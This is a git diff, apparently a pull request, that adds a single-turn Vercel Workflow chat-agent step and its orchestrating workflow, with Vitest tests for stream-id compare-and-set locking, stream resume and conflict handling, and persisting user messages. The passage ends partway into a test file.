 create mode 100644 lib/recoupable/extractOrgId.ts
 create mode 100644 lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts
 create mode 100644 lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts
 create mode 100644 lib/supabase/chat_messages/selectChatMessages.ts
 create mode 100644 lib/supabase/chat_messages/upsertChatMessage.ts
 create mode 100644 lib/supabase/chats/__tests__/updateChat.test.ts
 create mode 100644 lib/supabase/chats/updateChat.ts

diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
new file mode 100644
index 000000000..352dcd265
--- /dev/null
+++ b/app/lib/workflows/runAgentStep.ts
@@ -0,0 +1,55 @@
+import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai";
+import { gateway } from "@ai-sdk/gateway";
+import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions";
+
+export type RunAgentStepInput = {
+  messages: UIMessage[];
+  modelId: string;
+  writable: WritableStream<UIMessageChunk>;
+};
+
+/**
+ * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow
+ * `"use step"` function so that:
+ *
+ *   - APIs banned in the workflow body (`fetch`, `setTimeout`, `crypto`) are legal inside.
+ *   - The result is cached as a single durable event — replays after a crash
+ *     do not re-bill the model.
+ *
+ * Currently emits a plain text response with no tools. Sandbox tools land in
+ * the follow-up PR (port `@open-harness/agent` tools + wire via
+ * `experimental_context`).
+ *
+ * @param input - Messages + selected model + the workflow's writable stream.
+ * @returns finishReason from the model run (for the workflow loop's break condition).
+ */
+export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> {
+  "use step";
+
+  console.log("[runAgentStep] start", {
+    modelId: input.modelId,
+    messageCount: input.messages.length,
+  });
+
+  const modelMessages = convertToModelMessages(input.messages);
+  const result = streamText({
+    model: gateway(input.modelId),
+    system: agentCustomInstructions,
+    messages: modelMessages,
+  });
+
+  // Acquire the writer once and release it in `finally` — acquiring it per
+  // chunk without a `finally` leaves the stream locked if any write throws.
+  const writer = input.writable.getWriter();
+  try {
+    for await (const part of result.toUIMessageStream()) {
+      await writer.write(part);
+    }
+  } finally {
+    writer.releaseLock();
+  }
+
+  const finishReason = await result.finishReason;
+  console.log("[runAgentStep] finish", { finishReason });
+  return { finishReason };
+}
diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts
new file mode 100644
index 000000000..db679145a
--- /dev/null
+++ b/app/lib/workflows/runAgentWorkflow.ts
@@ -0,0 +1,56 @@
+import { getWritable } from "workflow";
+import type { UIMessage, UIMessageChunk } from "ai";
+import { runAgentStep } from "@/app/lib/workflows/runAgentStep";
+
+export type RunAgentWorkflowInput = {
+  messages: UIMessage[];
+  chatId: string;
+  sessionId: string;
+  modelId: string;
+};
+
+/**
+ * Vercel Workflow that drives the chat agent loop. The route handler calls
+ * `start(runAgentWorkflow, [...])` and pipes `run.getReadable()` back to the
+ * client; this function writes UIMessage chunks into the workflow's writable
+ * via `runAgentStep`.
+ *
+ * Currently runs a SINGLE `runAgentStep` turn. A multi-turn agent loop is
+ * unsafe today: each iteration would re-send the original prompt without
+ * the assistant's tool-call response in scope, so a `tool-calls` finish
+ * reason would loop forever on the same input. The proper multi-turn
+ * shape (where the step appends its response to `messages` before the
+ * next iteration) lands with the sandbox-tool port in PR 4.
+ *
+ * Until then, if the model returns `tool-calls` we log a warning and exit
+ * — the client receives the partial tool-call chunks but no follow-up turn.
+ *
+ * WDK constraints honored:
+ *   - All I/O (streamText, fetches) lives in `"use step"` functions.
+ *   - The workflow body only orchestrates — no fetch / setTimeout / fs / crypto.
+ */
+export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise<void> {
+  "use workflow";
+
+  console.log("[runAgentWorkflow] start", {
+    chatId: input.chatId,
+    sessionId: input.sessionId,
+    modelId: input.modelId,
+  });
+
+  const writable = getWritable<UIMessageChunk>();
+  const result = await runAgentStep({
+    messages: input.messages,
+    modelId: input.modelId,
+    writable,
+  });
+
+  if (result.finishReason === "tool-calls") {
+    console.warn(
+      "[runAgentWorkflow] model returned tool-calls but tool execution is not wired yet; exiting after 1 turn",
+      { chatId: input.chatId },
+    );
+  } else {
+    console.log("[runAgentWorkflow] finish", { finishReason: result.finishReason });
+  }
+}
diff --git a/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts b/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts
new file mode 100644
index 000000000..af22bd363
--- /dev/null
+++ b/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts
@@ -0,0 +1,51 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId";
+import { updateChat } from "@/lib/supabase/chats/updateChat";
+
+vi.mock("@/lib/supabase/chats/updateChat", () => ({
+  updateChat: vi.fn(),
+}));
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("compareAndSetChatActiveStreamId", () => {
+  it("returns ok:true claimed:true when the row predicate matches and is updated", async () => {
+    vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null });
+    const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x");
+    expect(result).toEqual({ ok: true, claimed: true });
+    expect(updateChat).toHaveBeenCalledWith(
+      { id: "chat-1", where: { active_stream_id: null } },
+      { active_stream_id: "wrun_x" },
+    );
+  });
+
+  it("returns ok:true claimed:false when the predicate matches no rows (race lost)", async () => {
+    vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 0, row: null });
+    const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x");
+    expect(result).toEqual({ ok: true, claimed: false });
+  });
+
+  it("returns ok:false with the underlying error on DB failure (distinct from race lost)", async () => {
+    vi.mocked(updateChat).mockResolvedValue({ ok: false, error: "down" });
+    const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x");
+    expect(result).toEqual({ ok: false, error: "down" });
+  });
+
+  it("supports expecting a specific run id (placeholder → real promotion)", async () => {
+    vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null });
+    await compareAndSetChatActiveStreamId("chat-1", "pending-abc", "wrun_real");
+    expect(updateChat).toHaveBeenCalledWith(
+      { id: "chat-1", where: { active_stream_id: "pending-abc" } },
+      { active_stream_id: "wrun_real" },
+    );
+  });
+
+  it("supports next=null (releasing the slot)", async () => {
+    vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null });
+    await compareAndSetChatActiveStreamId("chat-1", "wrun_old", null);
+    expect(updateChat).toHaveBeenCalledWith(
+      { id: "chat-1", where: { active_stream_id: "wrun_old" } },
+      { active_stream_id: null },
+    );
+  });
+});
diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
index c61911be8..fb3b434f1 100644
--- a/lib/chat/__tests__/handleChatWorkflowStream.test.ts
+++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
@@ -6,22 +6,38 @@ import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow";
 import { selectSessions } from "@/lib/supabase/sessions/selectSessions";
 import { selectChats } from "@/lib/supabase/chats/selectChats";
 import { isSandboxActive } from "@/lib/sandbox/isSandboxActive";
+import { updateSession } from "@/lib/supabase/sessions/updateSession";
+import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId";
+import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream";
+import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage";
+import { start, getRun } from "workflow/api";
 
-vi.mock("@/lib/chat/validateChatWorkflow", () => ({
-  validateChatWorkflow: vi.fn(),
+vi.mock("@/lib/chat/validateChatWorkflow", () => ({ validateChatWorkflow: vi.fn() }));
+vi.mock("@/lib/supabase/sessions/selectSessions", () => ({ selectSessions: vi.fn() }));
+vi.mock("@/lib/supabase/chats/selectChats", () => ({ selectChats: vi.fn() }));
+vi.mock("@/lib/chat/compareAndSetChatActiveStreamId", () => ({
+  compareAndSetChatActiveStreamId: vi.fn(),
 }));
-vi.mock("@/lib/supabase/sessions/selectSessions", () => ({
-  selectSessions: vi.fn(),
+vi.mock("@/lib/sandbox/isSandboxActive", () => ({ isSandboxActive: vi.fn() }));
+vi.mock("@/lib/supabase/sessions/updateSession", () => ({ updateSession: vi.fn() }));
+vi.mock("@/lib/sandbox/buildActiveLifecycleUpdate", () => ({
+  buildActiveLifecycleUpdate: vi.fn(() => ({})),
 }));
-vi.mock("@/lib/supabase/chats/selectChats", () => ({
-  selectChats: vi.fn(),
+vi.mock("@/lib/chat/maybeResumeChatStream", () => ({
+  maybeResumeChatStream: vi.fn(),
 }));
-vi.mock("@/lib/sandbox/isSandboxActive", () => ({
-  isSandboxActive: vi.fn(),
+vi.mock("@/lib/chat/persistLatestUserMessage", () => ({
+  persistLatestUserMessage: vi.fn(),
 }));
+vi.mock("workflow/api", () => ({
+  start: vi.fn(),
+  getRun: vi.fn(),
+}));
+vi.mock("@/app/lib/workflows/runAgentWorkflow", () => ({ runAgentWorkflow: vi.fn() }));
 vi.mock("@/lib/networking/getCorsHeaders", () => ({
   getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })),
 }));
+vi.mock("@/lib/uuid/generateUUID", () => ({ default: vi.fn(() => "deterministic-uuid") }));
 
 const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa";
 const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb";
@@ -36,130 +52,275 @@ function makeRequest(): NextRequest {
   });
 }
 
-function mockValidatedRequest(overrides: Partial<{ accountId: string }> = {}) {
+function mockValidated() {
   vi.mocked(validateChatWorkflow).mockResolvedValue({
     messages: [],
     chatId: CHAT_ID,
     sessionId: SESSION_ID,
-    accountId: overrides.accountId ?? ACCOUNT_ID,
+    accountId: ACCOUNT_ID,
     orgId: null,
     authToken: "test-key",
   });
 }
 
-function mockOwnedSessionWithActiveSandbox() {
-  mockValidatedRequest();
+function mockSessionOwnedActive(extra: Record<string, unknown> = {}) {
   vi.mocked(selectSessions).mockResolvedValue([
-    { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+    { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true }, ...extra } as never,
   ]);
-  vi.mocked(selectChats).mockResolvedValue([{ id: CHAT_ID, session_id: SESSION_ID } as never]);
   vi.mocked(isSandboxActive).mockReturnValue(true);
 }
 
-describe("handleChatWorkflowStream (stub)", () => {
-  beforeEach(() => {
-    vi.clearAllMocks();
+function mockChatOwned(extra: Record<string, unknown> = {}) {
+  vi.mocked(selectChats).mockResolvedValue([
+    {
+      id: CHAT_ID,
+      session_id: SESSION_ID,
+      active_stream_id: null,
+      model_id: null,
+      ...extra,
+    } as never,
+  ]);
+}
+
+function mockStartedRun(runId = "wrun_test_run_1") {
+  const stream = new ReadableStream<unknown>({
+    start(controller) {
+      controller.enqueue({ type: "text-start", id: "a" });
+      controller.close();
+    },
   });
+  vi.mocked(start).mockResolvedValue({ runId, getReadable: () => stream } as never);
+  vi.mocked(getRun).mockReturnValue({ cancel: vi.fn(() => Promise.resolve()) } as never);
+  return { runId, stream };
+}
+
+beforeEach(() => {
+  vi.clearAllMocks();
+  // Default: maybeResumeChatStream returns null (no resume / no active stream)
+  vi.mocked(maybeResumeChatStream).mockResolvedValue(null);
+});
 
-  describe("validation short-circuits", () => {
-    it("returns the validator's short-circuit response unchanged (e.g. 401)", async () => {
-      const authError = NextResponse.json(
-        { status: "error", error: "Unauthorized" },
-        { status: 401 },
+describe("handleChatWorkflowStream", () => {
+  describe("short-circuit responses", () => {
+    it("passes through the validator's response (401/400)", async () => {
+      vi.mocked(validateChatWorkflow).mockResolvedValue(
+        NextResponse.json({ status: "error", error: "Unauthorized" }, { status: 401 }),
       );
-      vi.mocked(validateChatWorkflow).mockResolvedValue(authError);
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(401);
+      expect(start).not.toHaveBeenCalled();
     });
 
-    it("returns the validator's 400 unchanged (e.g. invalid body)", async () => {
-      const badBody = NextResponse.json(
-        { status: "error", error: "Invalid JSON body" },
-        { status: 400 },
-      );
-      vi.mocked(validateChatWorkflow).mockResolvedValue(badBody);
+    it("returns 500 when selectSessions errors", async () => {
+      mockValidated();
+      vi.mocked(selectSessions).mockResolvedValue(null);
       const res = await handleChatWorkflowStream(makeRequest());
-      expect(res.status).toBe(400);
+      expect(res.status).toBe(500);
     });
-  });
 
-  describe("session / chat ownership", () => {
-    beforeEach(() => mockValidatedRequest());
-
-    it("returns 404 when the session does not exist", async () => {
+    it("returns 404 when session does not exist", async () => {
+      mockValidated();
       vi.mocked(selectSessions).mockResolvedValue([]);
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(404);
     });
 
-    it("returns 500 when selectSessions errors (returns null)", async () => {
-      vi.mocked(selectSessions).mockResolvedValue(null);
-      const res = await handleChatWorkflowStream(makeRequest());
-      expect(res.status).toBe(500);
-    });
-
-    it("returns 403 when the session is owned by a different account", async () => {
+    it("returns 403 when session not owned", async () => {
+      mockValidated();
       vi.mocked(selectSessions).mockResolvedValue([
-        { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: { ready: true } } as never,
+        { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: {} } as never,
       ]);
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(403);
     });
 
-    it("returns 400 'Sandbox not initialized' when sandbox is inactive", async () => {
+    it("returns 400 when sandbox is inactive", async () => {
+      mockValidated();
       vi.mocked(selectSessions).mockResolvedValue([
         { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: null } as never,
       ]);
       vi.mocked(isSandboxActive).mockReturnValue(false);
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(400);
-      const body = await res.json();
-      expect(body.error).toMatch(/sandbox/i);
     });
 
-    it("returns 404 when the chat does not exist", async () => {
-      vi.mocked(selectSessions).mockResolvedValue([
-        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
-      ]);
-      vi.mocked(isSandboxActive).mockReturnValue(true);
+    it("returns 404 when chat does not exist", async () => {
+      mockValidated();
+      mockSessionOwnedActive();
       vi.mocked(selectChats).mockResolvedValue([]);
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(404);
     });
+  });
 
-    it("returns 404 when chat exists but belongs to a different session", async () => {
-      vi.mocked(selectSessions).mockResolvedValue([
-        { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never,
-      ]);
-      vi.mocked(isSandboxActive).mockReturnValue(true);
-      vi.mocked(selectChats).mockResolvedValue([
-        { id: CHAT_ID, session_id: "different-session" } as never,
-      ]);
+  describe("resume / conflict via maybeResumeChatStream", () => {
+    beforeEach(() => {
+      mockValidated();
+      mockSessionOwnedActive();
+      mockChatOwned({ active_stream_id: "wrun_existing" });
+    });
+
+    it("returns the resume response when maybeResumeChatStream yields one", async () => {
+      const resumeResponse = new Response("ok", {
+        status: 200,
+        headers: { "x-workflow-run-id": "wrun_existing" },
+      });
+      vi.mocked(maybeResumeChatStream).mockResolvedValue(resumeResponse);
       const res = await handleChatWorkflowStream(makeRequest());
-      expect(res.status).toBe(404);
+      expect(res.headers.get("x-workflow-run-id")).toBe("wrun_existing");
+      expect(start).not.toHaveBeenCalled();
+    });
+
+    it("returns the conflict response when maybeResumeChatStream yields 409", async () => {
+      const conflict = NextResponse.json({ status: "error", error: "conflict" }, { status: 409 });
+      vi.mocked(maybeResumeChatStream).mockResolvedValue(conflict);
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(409);
+      expect(start).not.toHaveBeenCalled();
     });
   });
 
-  describe("success (stub response)", () => {
-    beforeEach(() => mockOwnedSessionWithActiveSandbox());
+  describe("placeholder CAS before start", () => {
+    beforeEach(() => {
+      mockValidated();
+      mockSessionOwnedActive();
+      mockChatOwned();
+    });
+
+    it("returns 500 when the placeholder-CAS hits a DB error", async () => {
+      vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValueOnce({
+        ok: false,
+        error: "down",
+      });
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(500);
+      expect(start).not.toHaveBeenCalled();
+    });
 
-    it("returns 200 with text/event-stream content type", async () => {
+    it("returns 409 (without calling start) when the placeholder-CAS loses the race", async () => {
+      vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValueOnce({
+        ok: true,
+        claimed: false,
+      });
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(409);
+      expect(start).not.toHaveBeenCalled();
+    });
+
+    it("starts the workflow only after placeholder CAS succeeds", async () => {
+      // First CAS = placeholder claim, second CAS = promote placeholder → real run id
+      vi.mocked(compareAndSetChatActiveStreamId)
+        .mockResolvedValueOnce({ ok: true, claimed: true })
+        .mockResolvedValueOnce({ ok: true, claimed: true });
+      mockStartedRun();
+      const res = await handleChatWorkflowStream(makeRequest());
+      expect(res.status).toBe(200);
+      expect(start).toHaveBeenCalled();
+      // Confirm CAS-before-start ordering — first CAS pre-claims with expected=null
+      const firstCallArgs = vi.mocked(compareAndSetChatActiveStreamId).mock.calls[0];
+      expect(firstCallArgs?.[0]).toBe(CHAT_ID);
+      expect(firstCallArgs?.[1]).toBeNull();
+      expect(firstCallArgs?.[2]).toMatch(/^pending-/);
+    });
+  });
+
+  describe("happy path", () => {
+    beforeEach(() => {
+      mockValidated();
+      mockSessionOwnedActive();
+      mockChatOwned();
+      vi.mocked(compareAndSetChatActiveStreamId)
+        .mockResolvedValueOnce({ ok: true, claimed: true })
+        .mockResolvedValueOnce({ ok: true, claimed: true });
+    });
+
+    it("returns 200 with text/event-stream and x-workflow-run-id", async () => {
+      const { runId } = mockStartedRun("wrun_abc_123");
       const res = await handleChatWorkflowStream(makeRequest());
       expect(res.status).toBe(200);
       expect(res.headers.get("content-type") ?? "").toMatch(/text\/event-stream/);
+      expect(res.headers.get("x-workflow-run-id")).toBe(runId);
+    });
+
+    it("refreshes session lifecycle activity", async () => {
+      mockStartedRun();
+      await handleChatWorkflowStream(makeRequest());
+      expect(updateSession).toHaveBeenCalledWith(SESSION_ID, expect.any(Object));
+    });
+
+    it("fire-and-forgets persistLatestUserMessage", async () => {
+      mockStartedRun();
+      await handleChatWorkflowStream(makeRequest());
+      expect(persistLatestUserMessage).toHaveBeenCalledWith(CHAT_ID, []);
+    });
+
+    it("passes chat.model_id into the workflow when set", async () => {
+      vi.mocked(selectChats).mockResolvedValue([
+        {
+          id: CHAT_ID,
+          session_id: SESSION_ID,
+          active_stream_id: null,
+          model_id: "anthropic/claude-opus-4.6",
+        } as never,
+      ]);
+      mockStartedRun();
+      await handleChatWorkflowStream(makeRequest());
+      const startArgs = vi.mocked(start).mock.calls[0]?.[1]?.[0] as { modelId: string };
+      expect(startArgs.modelId).toBe("anthropic/claude-opus-4.6");
+    });
+
+    it("falls back to the default model when chat.model_id is null", async () => {
+      mockStartedRun();
+      await handleChatWorkflowStream(makeRequest());
+      const startArgs = vi.mocked(start).mock.calls[0]?.[1]?.[0] as { modelId: string };
+      expect(startArgs.modelId).toBe("anthropic/claude-haiku-4.5");
+    });
+  });
+
+  describe("promote placeholder → run id", () => {
+    beforeEach(() => {
+      mockValidated();
+      mockSessionOwnedActive();
+      mockChatOwned();
     });
 
-    it("sets an x-workflow-run-id response header starting with stub-", async () => {
+    it("awaits cancel() and returns 409 if promote loses", async () => {
+      vi.mocked(compareAndSetChatActiveStreamId)
+        .mockResolvedValueOnce({ ok: true, claimed: true }) // claim ok
+        .mockResolvedValueOnce({ ok: true, claimed: false }); // promote raced
+      const cancel = vi.fn(() => Promise.resolve());
+      vi.mocked(start).mockResolvedValue({
+        runId: "wrun_lost",
+        getReadable: () => new ReadableStream(),
+      } as never);
+      vi.mocked(getRun).mockReturnValue({ cancel } as never);
       const res = await handleChatWorkflowStream(makeRequest());
-      const runId = res.headers.get("x-workflow-run-id");
-      expect(runId).toBeTruthy();
-      expect(runId!.startsWith("stub-")).toBe(true);
+      expect(res.status).toBe(409);
+      expect(getRun).toHaveBeenCalledWith("wrun_lost");
+      expect(cancel).toHaveBeenCalled();
     });
 
-    it("emits a stream body that includes the stub assistant text", async () => {
+    it("still returns 409 if cancel() throws (best-effort)", async () => {
+      vi.mocked(compareAndSetChatActiveStreamId)
+        .mockResolvedValueOnce({ ok: true, claimed: true })
+        .mockResolvedValueOnce({ ok: true, claimed: false });
+      vi.mocked(start).mockResolvedValue({
+        runId: "wrun_lost",
+        getReadable: () => new ReadableStream(),
+      } as never);
+      // Wrap rejection in an async IIFE + attach a noop handler so Vitest's
+      // unhandled-rejection watcher doesn't fire before the SUT awaits.
+      const cancelRejection = (async () => {
+        throw new Error("cancel exploded");
+      })();
+      cancelRejection.catch(() => {
+        /* noop — the SUT awaits this promise and catches (logs) the rejection */
+      });
+      vi.mocked(getRun).mockReturnValue({
+        cancel: vi.fn(() => cancelRejection),
+      } as never);
       const res = await handleChatWorkflowStream(makeRequest());
-      const text = await res.text();
-      expect(text).toContain("Hello from /api/chat/workflow");
+      expect(res.status).toBe(409);
     });
   });
 });
diff --git a/lib/chat/__tests__/maybeResumeChatStream.test.ts b/lib/chat/__tests__/maybeResumeChatStream.test.ts
new file mode 100644
index 000000000..999c29d24
--- /dev/null
+++ b/lib/chat/__tests__/maybeResumeChatStream.test.ts
@@ -0,0 +1,46 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream";
+import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream";
+
+vi.mock("@/lib/chat/reconcileExistingActiveStream", () => ({
+  reconcileExistingActiveStream: vi.fn(),
+}));
+vi.mock("@/lib/networking/getCorsHeaders", () => ({
+  getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })),
+}));
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("maybeResumeChatStream", () => {
+  it("returns null when there is no active_stream_id", async () => {
+    const res = await maybeResumeChatStream("chat-1", null);
+    expect(res).toBeNull();
+    expect(reconcileExistingActiveStream).not.toHaveBeenCalled();
+  });
+
+  it("returns null when reconcile says action=ready", async () => {
+    vi.mocked(reconcileExistingActiveStream).mockResolvedValue({ action: "ready" });
+    const res = await maybeResumeChatStream("chat-1", "wrun_dead");
+    expect(res).toBeNull();
+  });
+
+  it("returns a 200 SSE response with x-workflow-run-id on resume", async () => {
+    const stream = new ReadableStream();
+    vi.mocked(reconcileExistingActiveStream).mockResolvedValue({
+      action: "resume",
+      runId: "wrun_live",
+      stream,
+    });
+    const res = await maybeResumeChatStream("chat-1", "wrun_live");
+    expect(res).not.toBeNull();
+    expect(res!.status).toBe(200);
+    expect(res!.headers.get("x-workflow-run-id")).toBe("wrun_live");
+    expect(res!.headers.get("content-type") ?? "").toMatch(/text\/event-stream/);
+  });
+
+  it("returns a 409 on conflict", async () => {
+    vi.mocked(reconcileExistingActiveStream).mockResolvedValue({ action: "conflict" });
+    const res = await maybeResumeChatStream("chat-1", "wrun_x");
+    expect(res!.status).toBe(409);
+  });
+});
diff --git a/lib/chat/__tests__/persistLatestUserMessage.test.ts b/lib/chat/__tests__/persistLatestUserMessage.test.ts
new file mode 100644
index 000000000..28d4f7650
--- /dev/null
+++ b/lib/chat/__tests__/persistLatestUserMessage.test.ts
@@ -0,0 +1,129 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage";
+
+import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage";
+import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages";
+import { updateChat } from "@/lib/supabase/chats/updateChat";
+
+vi.mock("@/lib/supabase/chat_messages/upsertChatMessage", () => ({
+  upsertChatMessage: vi.fn(),
+}));
+vi.mock("@/lib/supabase/chat_messages/selectChatMessages", () => ({
+  selectChatMessages: vi.fn(),
+}));
+vi.mock("@/lib/supabase/chats/updateChat", () => ({
+  updateChat: vi.fn(),
+}));
+
+const CHAT_ID = "chat-1";
+const MSG_ID = "msg-1";
+
+function userMessage(text = "hello world", id = MSG_ID) {
+  return { id, role: "user" as const, parts: [{ type: "text" as const, text }] };
+}
+
+beforeEach(() => {
+  vi.clearAllMocks();
+});
+
+describe("persistLatestUserMessage", () => {
+  it("no-ops when the last message is not a user message", async () => {
+    await persistLatestUserMessage(CHAT_ID, [{ id: "a", role: "assistant", parts: [] } as never]);
+    expect(upsertChatMessage).not.toHaveBeenCalled();
+    expect(updateChat).not.toHaveBeenCalled();
+  });
+
+  it("no-ops when messages array is empty", async () => {
+    await persistLatestUserMessage(CHAT_ID, []);
+    expect(upsertChatMessage).not.toHaveBeenCalled();
+  });
+
+  it("bails on DB error (upsert ok:false) without touching the chat", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({ ok: false, error: "down" });
+    await persistLatestUserMessage(CHAT_ID, [userMessage()]);
+    expect(updateChat).not.toHaveBeenCalled();
+  });
+
+  it("bails on duplicate (already persisted) without touching the chat", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({ ok: true, row: null, isDuplicate: true });
+    await persistLatestUserMessage(CHAT_ID, [userMessage()]);
+    expect(updateChat).not.toHaveBeenCalled();
+  });
+
+  it("touches updated_at after a new insert", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({
+      ok: true,
+      row: { id: MSG_ID } as never,
+      isDuplicate: false,
+    });
+    vi.mocked(selectChatMessages).mockResolvedValue([{ id: "different-msg" } as never]);
+    await persistLatestUserMessage(CHAT_ID, [userMessage()]);
+    const firstCall = vi.mocked(updateChat).mock.calls[0];
+    expect(firstCall?.[0]).toEqual({ id: CHAT_ID });
+    expect(firstCall?.[1]).toMatchObject({ updated_at: expect.any(String) });
+  });
+
+  it("sets chat.title when the inserted message is the earliest", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({
+      ok: true,
+      row: { id: MSG_ID } as never,
+      isDuplicate: false,
+    });
+    vi.mocked(selectChatMessages).mockResolvedValue([{ id: MSG_ID } as never]);
+    await persistLatestUserMessage(CHAT_ID, [userMessage("Hello there from a test")]);
+    const titleCall = vi
+      .mocked(updateChat)
+      .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined);
+    expect(titleCall?.[1]).toEqual({ title: "Hello there from a test" });
+  });
+
+  it("skips title when the inserted message is no longer the earliest", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({
+      ok: true,
+      row: { id: MSG_ID } as never,
+      isDuplicate: false,
+    });
+    vi.mocked(selectChatMessages).mockResolvedValue([{ id: "older-msg" } as never]);
+    await persistLatestUserMessage(CHAT_ID, [userMessage()]);
+    const titleCall = vi
+      .mocked(updateChat)
+      .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined);
+    expect(titleCall).toBeUndefined();
+  });
+
+  it("truncates titles to exactly TITLE_MAX_LENGTH including the suffix", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({
+      ok: true,
+      row: { id: MSG_ID } as never,
+      isDuplicate: false,
+    });
+    vi.mocked(selectChatMessages).mockResolvedValue([{ id: MSG_ID } as never]);
+    const long = "x".repeat(120);
+    await persistLatestUserMessage(CHAT_ID, [userMessage(long)]);
+    const titleCall = vi
+      .mocked(updateChat)
+      .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined);
+    const title = (titleCall?.[1] as { title: string }).title;
+    expect(title.length).toBe(80);
+    expect(title.endsWith("…")).toBe(true);
+  });
+
+  it("bails on title-set when selectChatMessages errors (null)", async () => {
+    vi.mocked(upsertChatMessage).mockResolvedValue({
+      ok: true,
+      row: { id: MSG_ID } as never,
+      isDuplicate: false,
+    });
+    vi.mocked(selectChatMessages).mockResolvedValue(null);
+    await persistLatestUserMessage(CHAT_ID, [userMessage()]);
+    const titleCall = vi
+      .mocked(updateChat)
+      .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined);
+    expect(titleCall).toBeUndefined();
+  });
+
+  it("swallows thrown errors without escaping", async () => {
+    vi.mocked(upsertChatMessage).mockRejectedValue(new Error("boom"));
+    await expect(persistLatestUserMessage(CHAT_ID, [userMessage()])).resolves.toBeUndefined();
+  });
+});
diff --git a/lib/chat/__tests__/reconcileExistingActiveStream.test.ts b/lib/chat/__tests__/reconcileExistingActiveStream.test.ts
new file mode 100644
index 000000000..b40e12ce6
--- /dev/null
+++ b/lib/chat/__tests__/reconcileExistingActiveStream.test.ts
@@ -0,0 +1,92 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream";
+import { getRun } from "workflow/api";
+import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId";
+
+vi.mock("workflow/api", () => ({
+  getRun: vi.fn(),
+}));
+vi.mock("@/lib/chat/compareAndSetChatActiveStreamId", () => ({
+  compareAndSetChatActiveStreamId: vi.fn(),
+}));
+
+const CHAT_ID = "chat-1";
+const RUN_ID = "wrun_test";
+
+beforeEach(() => vi.clearAllMocks());
+
+function mockRun(status: string, getReadable: () => ReadableStream = () => new ReadableStream()) {
+  // Minimal stand-in for a workflow run: a resolved status plus a readable factory.
+  const fakeRun = { status: Promise.resolve(status), getReadable };
+  const getRunMock = vi.mocked(getRun);
+  getRunMock.mockReturnValue(fakeRun as never);
+}
+
+describe("reconcileExistingActiveStream", () => {
